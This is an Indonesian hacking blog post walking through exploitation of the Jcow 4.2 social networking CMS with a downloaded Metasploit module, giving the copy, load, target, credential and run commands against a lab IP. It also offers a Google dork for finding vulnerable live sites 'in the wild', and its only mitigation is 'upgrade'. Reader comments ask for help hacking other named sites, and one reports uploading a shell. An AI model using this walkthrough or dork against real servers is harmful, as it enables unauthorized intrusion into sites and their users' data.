Home / Hacking / Hacking Jcow Social Networking Webserver
jcow

Hacking Jcow Social Networking Webserver

Apakah teman-teman pernah melihat CMS yang satu ini?

Jcow social networking…Ya, memang demikian namanya… Jcow menawarkan aplikasi berbasis web untuk situs jejaring sosial secara gratis alias free dan bisa dilihat di websitenya jcow.net dengan ukuran file yang cukup kecil hanya 777KB tidak lebih dari 1 MB.

Jcow

Tapi disini yang akan saya bahas bukanlah mengenai penggunaan dari si Jcow ini sebagai situs pertemanan, melainkan terdapatnya suatu vulnerability dari beberapa versi dari Jcow yang ternyata dapat disusupi hanya dalam 4 langkah , dan bahkan si penyusup dapat melihat isi direktori web server korban(jika ternyata servernya pun tidak menerapkan pengamanan yang baik).

Pada contoh yang akan saya buat dibawah ini, korban menggunakan IP : 192.168.8.94…
Jauh lebih baik kalau kawan-kawan mau belajar menggunakan virtual lab terlebih dahulu, tapi kalau ternyata penasaran ingin langsung to the wild arena, kawan-kawan juga bisa cari via google dork : “Powered by Jcow 4.2.0“. Jika tertarik untuk langsung ke dunia nyata, kawan-kawan juga harus mempelajari logika dari teknik penyerangan via internet(klik disini)

O.S Penyerang : BT 5 R1
O.S Korban : XP SP3
Aplikasi vulnerable : Jcow 4.2

Pada artikel ini juga saya sebelumnya sudah membuat username : “victim dan password :”victim” pada aplikasi Jcow target.

Oke kita mulai langkah demi langkahnya dibawah ini

Kebutuhan :
1. Metasploit Framework (metasploit.com)
2. Script exploit jcow.rb (link mediafire di website asalnya)

Langkah-Langkahnya :
1. Copykan file exploit jcow.rb yang sudah di-download kedalam folder /pentest/exploits/framework/modules/exploits/remote/

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/

Jika bingung bagaimana cara meng-copy kan file exploit.rb kedalam Backtrack Linux, kawan-kawan bisa lihat tutorialnya disini.

2. Buka metasploit console dengan mengetikkan msfconsole pada terminal, lalu gunakan exploit yang sebelumnya sudah kita copy tadi.

msf > use exploit/remote/jcow

3. Selanjutnya ketikkan perintah show options untuk melihat switch apa saja yang dapat digunakan untuk exploit ini.

msf exploit(jcow) > set rhost 192.168.8.94 –> target IP
rhost => 192.168.8.94
msf exploit(jcow) > set username victim –> set username
username => victim
msf exploit(jcow) > set password victim –> set password
password => victim

4. Yep setelah semuanya selesai dikonfigurasi dengan baik, langkah terakhir tinggal menjalankan perintah exploit pada konsol metasploit.

Berhasil

Pengamanan :
1. Upgrade Jcow ke versi terbaru

Sumber : vishnuvalentino.com

About Artikel

Check Also

hacking-ruby-programming-binushacker

Hacking dan Tuning Ruby Programming

Hacking and Tuning Ruby Programming Hacking Ruby Guidance Daftar Isi Materi Beberapa bab masih dalam …

22 comments

  1. ada postingan bru,
    bgus gan

  2. weww,, mantap gan,,

  3. sadisss…….mantap gan…

  4. gan sorry nih OOT dkit pengen nanya dong cara install Backtrack 5 R1 dari usb/dvd/cd caranya gmn y>?

  5. ITU JCOW SAPA ,SIAPA YANG BUAT,???

  6. ikutan belajar dong tentang hakkr nya??

  7. Mohon pak di hack site malay ni http://xtweets.tk user2nya tidak enak smuanya

  8. mau dong jd angota hacker, n belajar byk…

  9. tolong posting hack mig33 dung..

  10. postingannya belum ada yang baru ya gan?

  11. saya ingin menjadi anggota binus hacker
    please

  12. @christian: Anda sudah berkunjung Kemari, dengan itu anda sudah menjadi Anggota Binus Hacker

  13. bagus trick nya.gw cba berhasil:D

  14. Kalo saya pake backtrack r2 copykan file exploit jcow.rb ke folder mana ya? soalnya saya ga nemuin folder di atas. Mohon bantuanya master

  15. saya sudah berhasil..
    tapi hanya keluar cookie..
    dan di situ bisa langsung upload shell..

    yang jadi pertanyaan bagaimana biar kita langsung bisa upload shell kaya yang di atas?

  16. wah makash bgt gan infonya,,
    jdi tmbh ilmu ni..
    thx

  17. arttikel nya keren gan

  18. keren gan gabung juga di jcow ku ya

  19. I enjoy checking your website. Thanks!

  20. You have great information right here.

  21. Hak webset jcow gua kalo lo emank bnr rj hacking webset cu-ma-cu-ma.cu.ma kalo lo gak bisa shre nih somed buatan g

  22. Jcow adalah situs luar biasa, ia menawarkan aplikasi berbasis web untuk situs jaringan sosial.

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *